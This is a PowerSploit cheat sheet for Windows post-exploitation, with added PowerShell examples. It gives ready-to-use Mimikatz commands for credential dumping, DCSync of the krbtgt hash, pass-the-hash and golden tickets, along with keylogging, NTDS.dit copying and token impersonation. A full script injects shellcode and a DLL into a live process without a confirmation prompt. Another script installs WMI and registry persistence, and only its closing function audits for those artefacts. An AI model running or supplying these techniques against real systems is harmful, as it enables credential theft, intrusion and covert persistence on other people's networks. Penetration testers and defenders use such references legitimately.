PowerSploit Cheat Sheet
Version 1.1 - Created by Will Schroeder (@harmj0y) and released under the Creative Commons v3 "Attribution" License.

Getting Started
Get PowerSploit: http://bit.ly/28RwLgo
PowerSploit Authors: @mattifestation, @obscuresec, @JosephBialek, @harmj0y, @secabstraction, @RichLundeen
Mimikatz Authors: @gentilkiwi and Vincent LE TOUX
Docs: http://powersploit.readthedocs.io/
Note: not all PowerSploit functions are covered, and not all options for covered functions are covered. PowerView and PowerUp have their own cheat sheets.

CodeExecution

Invoke-ReflectivePEInjection will reflectively load a DLL/EXE into powershell.exe or a remote process. Remote execution goes over PowerShell remoting (Invoke-Command), so WinRM must be reachable on the target.
  -PEBytes @(…)                    A byte array with the PE/DLL to load
  -ComputerName "comp1","comp2"    Optional: one or more remote computers to run the script on
  -ExeArgs "Arg1 Arg2…"            Optional arguments to pass to the loaded PE
  -ProcName <NAME>                 Optional process name to load the PE into
  -ProcId <ID>                     Optional process ID to load the PE into

Invoke-Shellcode will inject shellcode into powershell.exe (when no -ProcessID is given) or a remote process. Shellcode should be in the form of a byte array (e.g. 0xXX,0xXY,…) and must be built for the bitness of the process it is injected into.
To convert a raw shellcode file in Bash, run the following:
  hexdump -ve '/1 "0x%02x,"' file.bin | sed 's/.$//'
  -ProcessID <ID>                  Process ID to inject shellcode into
  -Shellcode @(0xXX,0xXY…)         Byte array of shellcode to inject
  -Force                           Switch: inject shellcode without prompting for confirmation

Invoke-WmiCommand executes PowerShell code on one or more target computers using WMI as a pure C2 channel.
  -Payload { … }                   The scriptblock to run on the target(s)
  -ComputerName "comp1","comp2"    Optional: one or more remote computers to run the script on
  -Credential $Cred                An optional PSCredential object to use for remote execution (default: current user)

Exfiltration

Get-GPPPassword will decrypt any found passwords set through Group Policy Preferences.

Get-Keystrokes will log keys pressed (along with the time and active window) to a file.
  -LogPath <PATH>                  Path for the output log file, defaults to $Env:Temp\key.log
  -Timeout <X>                     How long (in minutes) to capture keystrokes; default is indefinite

Get-TimedScreenshot will take screenshots on an interval and save them to disk.
  -LogPath <PATH>                  The folder path to save screenshots to
  -Interval <X>                    The interval (in seconds) between screenshots
  -EndTime HH-MM                   When the script should stop running, HH-MM format

Invoke-Mimikatz uses Invoke-ReflectivePEInjection to inject Mimikatz into memory. By default it will run the sekurlsa::logonpasswords module (the sekurlsa modules need local administrator rights).
To update the Mimikatz code, select the "Second_Release_PowerShell" compile target in the Mimikatz project, compile for both Win32 and x64, base64 -w 0 powerkatz.dll, and replace the base64-DLL strings in Invoke-Mimikatz.
  -ComputerName "comp1","comp2"    Optional: one or more remote computers to run the script on
  -Command '"CMD1" "CMD2"'         Custom Mimikatz commands (note: enclose in single quotes, each command in double quotes)

Useful custom Invoke-Mimikatz commands:
  Extract MSCache hashes                           '"token::elevate" "lsadump::cache" "token::revert"'
  Export Kerberos tickets as base64 blobs          '"standard::base64" "kerberos::list /export"'
  DCSync the KRBTGT hash for 'domain.local'        '"lsadump::dcsync /user:krbtgt /domain:domain.local"'
  Spawn a process with alternate NTLM credentials  '"sekurlsa::pth /user:user /domain:domain.local /ntlm:<NTLM> /run:cmd.exe"'
  Willy Wonka's Golden Ticket Generator            '"kerberos::golden /user:<USER> /krbtgt:<NTLM> /domain:domain.local /sid:<DOMAIN_SID> /ptt"'
  Purge Kerberos tickets                           '"kerberos::purge"'

Invoke-NinjaCopy can copy locked files from a system by opening up raw disk access and parsing the NTFS structures. This is useful for cloning off things like NTDS.dit and SYSTEM hives. Raw volume access requires local administrator rights.
  -Path C:\Windows\NTDS\NTDS.dit           Full path of the file to copy
  -LocalDestination C:\Temp\NTDS.dit       Local destination to copy the file to
  -RemoteDestination C:\Temp\NTDS.dit      Destination on the remote server to copy the file to
  -ComputerName "comp1","comp2"            Optional: one or more remote computers to run the script on
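The byte-array input that both Invoke-Shellcode (-Shellcode) and Invoke-ReflectivePEInjection (-PEBytes) take, prepared in PowerShell rather than with the Bash hexdump line above. This is an added example and not code from the cheat sheet or from PowerSploit; it assumes CodeExecution.psm1 has been imported, that the two file paths under C:\Temp exist, and that a notepad.exe of the same bitness as the running PowerShell is available as the target. The MZ check is there because the two files are easy to swap, and the module will not tell you which one you handed it.

```powershell
# Added example (not from the cheat sheet or PowerSploit). Assumes:
#   Import-Module .\PowerSploit\CodeExecution\CodeExecution.psm1   (path is an assumption)
#   C:\Temp\shellcode.bin = raw shellcode, C:\Temp\payload.dll = DLL for the target bitness

function ConvertTo-ByteArrayLiteral {
    # Same "0x90,0xe8,..." text the cheat sheet's hexdump|sed one-liner produces,
    # for scripts that must carry the bytes inline instead of reading a file.
    param([Parameter(Mandatory)][byte[]]$Bytes)
    return (($Bytes | ForEach-Object { '0x{0:x2}' -f $_ }) -join ',')
}

function Test-PEBytes {
    # A DLL/EXE for -PEBytes starts with the 'MZ' DOS header; raw shellcode for
    # -Shellcode must not. Returns $true for a PE image.
    param([Parameter(Mandatory)][byte[]]$Bytes)
    return ($Bytes.Length -gt 2 -and $Bytes[0] -eq 0x4D -and $Bytes[1] -eq 0x5A)
}

# Read the files straight into the [byte[]] the functions expect; no hex round-trip needed.
[byte[]]$Sc = [IO.File]::ReadAllBytes('C:\Temp\shellcode.bin')
[byte[]]$Pe = [IO.File]::ReadAllBytes('C:\Temp\payload.dll')

if (Test-PEBytes -Bytes $Sc)        { throw 'shellcode.bin starts with MZ: that is a PE, use -PEBytes for it' }
if (-not (Test-PEBytes -Bytes $Pe)) { throw 'payload.dll has no MZ header: not a PE image' }

# Optional: the pasteable literal form. Pasting it as
#   [byte[]]$Sc = 0x90,0xe8,...
# works because PowerShell parses 0xNN as integers and the cast narrows them to bytes.
ConvertTo-ByteArrayLiteral -Bytes $Sc | Set-Content -Path 'C:\Temp\shellcode.txt'

# Shellcode and PE must match the target's bitness: a 64-bit PowerShell session can
# only inject 64-bit code into a 64-bit process. [IntPtr]::Size is 8 in a 64-bit host.
Write-Host ("Host is {0}-bit; pick a target of the same bitness" -f ([IntPtr]::Size * 8))
$Target = Get-Process -Name notepad -ErrorAction Stop | Select-Object -First 1

# -Force skips the confirmation prompt (see the -Force switch above).
Invoke-Shellcode -ProcessID $Target.Id -Shellcode $Sc -Force

# Same target, this time a whole DLL loaded reflectively (use -ExeArgs for an EXE).
Invoke-ReflectivePEInjection -PEBytes $Pe -ProcId $Target.Id
```

Omitting -ProcessID / -ProcId injects into the current powershell.exe instead, which is the simpler choice when the payload only needs to run once and die with the session.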
Invoke-TokenManipulation manipulates tokens and is roughly equivalent to Incognito (enumerating or impersonating other users' tokens requires local administrator rights).
  -Enumerate                  Switch: enumerate unique usable tokens
  -WhoAmI                     Display current credentials for the powershell.exe process
  -RevToSelf                  Switch: revert to the original token context
  -ShowAll                    Switch: show ALL tokens
  -CreateProcess "cmd.exe"    Create an alternate process with a given token; use with -Username, -ProcessId or -ThreadId
  -Username <X>               Specify the token to impersonate by username
  -ProcessId <Y>              Specify the token to impersonate by process ID
  -ThreadId <Z>               Specify the token to impersonate by thread ID
  -NoUI                       Switch: use if the created process doesn't need a UI

Out-Minidump generates a full-memory minidump of a process, similar to procdump.exe with the '-ma' switch.
Example: dump memory of all processes to C:\Temp:
  Get-Process | Out-Minidump -DumpFilePath C:\Temp
  -Process (Get-Process -Id 4293)   The process object to dump memory for, passable on the pipeline
  -DumpFilePath .\file.dmp          Path to save the memory dump to, defaults to .\processname_id.dmp

Persistence

Add-Persistence adds persistence capabilities to a script.
  -ScriptBlock {…}                   Payload script block
  -FilePath .\file.ps1               Payload file
  -ElevatedPersistenceOption $X      Elevated persistence options (built with New-ElevatedPersistenceOption)
  -UserPersistenceOption $Y          Userland persistence options (built with New-UserPersistenceOption)

New-UserPersistenceOption builds a user-land option set usable by Add-Persistence.
  -Registry         Switch: persist via the CurrentVersion\Run key
    -AtLogon        Run the registry payload on any user logon
  -ScheduledTask    Switch: use a userland scheduled task
    -OnIdle         Run the schtask after one minute of idling
    -Daily          Run the schtask daily
    -Hourly         Run the schtask hourly
    -At HH:MM       Run the schtask at the specified time

New-ElevatedPersistenceOption builds an elevated option set usable by Add-Persistence.
  -Registry         Switch: persist via the CurrentVersion\Run key
  -ScheduledTask    Switch: use a SYSTEM scheduled task
  -PermanentWMI     Switch: use a permanent WMI subscription
    -OnIdle         Run the schtask after one minute of idling
    -Hourly         Run the schtask hourly
    -AtLogon        Run the schtask/registry payload on any user logon
    -Daily          Run the schtask/WMI sub daily
    -At HH:MM       Run the schtask/WMI sub at the specified time
    -AtStartup      Run the WMI sub within 5 min of system boot

Recon

Invoke-Portscan is a simple threaded port scanner that mimics nmap's options.
  -Hosts host1,host2,…          Hosts to scan, in hostname, IP, or CIDR format (e.g. -Hosts 192.168.1.0/24)
  -HostFile .\hosts.txt         File with host specifications
  -ExcludeHosts host3,host4     Comma-separated list of hosts to exclude
  -Ports 21,80-100              Ports to scan
  -TopPorts <50-1000>           Scan the X most common ports
  -ExcludedPorts X,Y            Exclude ports from the scan
  -SkipDiscovery                Treat all hosts as online
  -PingOnly                     Ping scan only (disable port scan)
  -Threads <X>                  Number of threads to use, defaults to 100
  -Timeout <Y>                  Timeout (in milliseconds) for each port check
  -nHosts <Z>                   Number of hosts to scan concurrently
  -T [1-5]                      Performance options, higher is more aggressive
  -GrepOut <file>               Greppable output
  -XMLOut <file>                XML output
  -ReadableOut <file>           Readable output
  -AllformatsOut <file>         All output formats
  -quiet                        Suppress console output, useful for large scans

More Information
https://github.com/PowerShellMafia/PowerSploit
http://www.exploit-monday.com/
https://obscuresecurity.blogspot.com/
https://clymb3r.wordpress.com/
http://blog.harmj0y.net/
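The Persistence workflow above (New-UserPersistenceOption, New-ElevatedPersistenceOption, Add-Persistence) carried through end to end, followed by an audit of the three places those options write to. This is an added example, not code from the cheat sheet or from PowerSploit. It assumes the module path shown, that Add-Persistence accepts -DoNotPersistImmediately and writes Persistence.ps1 / RemovePersistence.ps1 to the current directory (the behaviour of the PowerSploit versions I know; confirm with Get-Help Add-Persistence), and an elevated session for the WMI and HKLM queries. The payload is a constructed stand-in.

```powershell
# Added example (not from the cheat sheet or PowerSploit). Module path is an assumption.
Import-Module .\PowerSploit\Persistence\Persistence.psm1

# Constructed stand-in payload; a real one would be whatever -ScriptBlock/-FilePath carries.
$Payload = { Write-Output "persisted on $env:COMPUTERNAME at $(Get-Date)" }

# Add-Persistence requires BOTH option sets and picks one at run time depending on
# whether the generated script runs elevated or not.
$Elevated = New-ElevatedPersistenceOption -PermanentWMI -AtStartup   # fires within ~5 min of boot
$User     = New-UserPersistenceOption     -Registry     -AtLogon     # HKCU Run key, fires at logon

# -DoNotPersistImmediately only writes Persistence.ps1 and RemovePersistence.ps1 so the
# generated script can be read before anything is installed (assumed switch, see lead-in).
Add-Persistence -ScriptBlock $Payload `
                -ElevatedPersistenceOption $Elevated `
                -UserPersistenceOption $User `
                -DoNotPersistImmediately
Get-Content .\Persistence.ps1 | Select-Object -First 20

function Get-PersistenceArtifacts {
    # Returns one object per artefact found in the locations the option sets use:
    # Run keys (-Registry), scheduled tasks (-ScheduledTask) and permanent WMI
    # subscriptions (-PermanentWMI). Useful both to confirm the install and to hunt it.
    [CmdletBinding()] param()

    foreach ($Key in 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
                     'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run') {
        if (-not (Test-Path $Key)) { continue }
        (Get-ItemProperty -Path $Key).PSObject.Properties |
            Where-Object { $_.Name -notmatch '^PS' } |      # drop PSPath/PSDrive/... metadata
            ForEach-Object { [pscustomobject]@{ Source = 'Run key'; Name = $_.Name; Detail = [string]$_.Value } }
    }

    Get-ScheduledTask | ForEach-Object {
        $Task = $_
        foreach ($Action in $Task.Actions) {
            # PowerSploit's tasks launch powershell with an encoded or inline command.
            if ($Action.Execute -match 'powershell' -or $Action.Arguments -match '-enc|-Command|-C ') {
                [pscustomobject]@{ Source = 'SchTask'; Name = $Task.TaskName;
                                   Detail = "$($Action.Execute) $($Action.Arguments)" }
            }
        }
    }

    # Permanent subscriptions live in root\subscription: a filter (WQL trigger) bound to a consumer.
    Get-CimInstance -Namespace root\subscription -ClassName __EventFilter -ErrorAction SilentlyContinue |
        ForEach-Object { [pscustomobject]@{ Source = 'WMI filter';   Name = $_.Name; Detail = $_.Query } }
    Get-CimInstance -Namespace root\subscription -ClassName CommandLineEventConsumer -ErrorAction SilentlyContinue |
        ForEach-Object { [pscustomobject]@{ Source = 'WMI consumer'; Name = $_.Name; Detail = $_.CommandLineTemplate } }
}

Get-PersistenceArtifacts | Format-Table -AutoSize -Wrap
```

Run the audit before and after executing the generated Persistence.ps1 and diff the two listings; the same function, dropped into a scheduled collection job, is a serviceable detection for all three mechanisms, not just PowerSploit's use of them.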